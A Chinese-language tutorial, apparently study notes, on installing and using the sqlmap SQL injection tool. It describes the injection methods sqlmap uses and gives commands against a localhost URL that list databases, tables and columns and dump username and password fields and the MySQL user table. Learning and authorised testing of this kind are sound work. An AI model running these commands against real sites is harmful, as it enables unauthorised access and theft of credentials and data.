一、sqlmap介绍

  简介：是一个自动化的sql注入工具，主要功能扫描、发现并利用给定的
        url的sql注入漏洞，内置了很多插件
  sqlmap支持的数据库： MySQL、oracle、sql-server、DB2....
  注意：sqlmap只用来检测和sql注入，不能扫描网站的漏洞
sqlmap使用的sql注入方式：
    1、基于布尔类型盲注：可以根据页面的返回判断条件真假的注入
    2、基于时间的盲注；根据页面返回内容判断，延迟时间是否执行
    3、基于报错注入：根据页面返回的错误信息
    4、联合查询注入：根据使用的union的情况下注入

sqlmap的简单使用：
  -u  url:  检测的注入点
  --dbs:   列出所有数据库的名称
  --current-db: 列出当前的数据库名称
  -D：   指定的一个数据库
  --tables:  列出数据库表名称
  -T：   指定的一个表名称
  --columns: 列出所有的字段名
  -C:    指定字段
  --dump：  列出字段的内容
  --users: 获取数据所有的用户信息

安装sqlmap:

  1、安装Python2.7 ，新建一个目录：python2.7
  2、双击Python安装包，安装到python2.7目录
  3、将python2.7添加环境变量
  4、解压sqlmap1.5压缩包到D盘：d:/sqlmap
  5、win+R 输入cmd 进入到D盘
        C:\Users\xiaolin>d:
        D:\>cd sqlmap
        D:\sqlmap>sqlmap.py  回车，如果出现sqlmap图标说明成功

           
二、使用sqlmap

 1、获取数据库的所有数据库名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xxx --dbs
 2、获取当前的数据库名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xx --current-db
    获取到的数据库名称： news
 3、获取当前的数据库news所有表名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xx -D news --tables
 4、获取当前的数据库news下news_users表所有字段名称
 sqlmap.py  sqlmap -u http://127.0.0.1/nxxx -D news -T news_users --columns
 5、获取news库下的news_users表的数据
 sqlmap.py  sqlmap -u http://127.0.0.1/nxxx -D news -T news_users -C username,password --dump

 

 

 

 

获取MySQL数据库管理员信息： 
sqlmap.py  sqlmap -u http://127.0.0.1/nxx -D mysql -T  user --dump
 
sqlmap.py  sqlmap -u http://127.0.0.1/xx -D  information_schema  -T tables -C TABLE_NAME,TABLE_SCHEMA --dump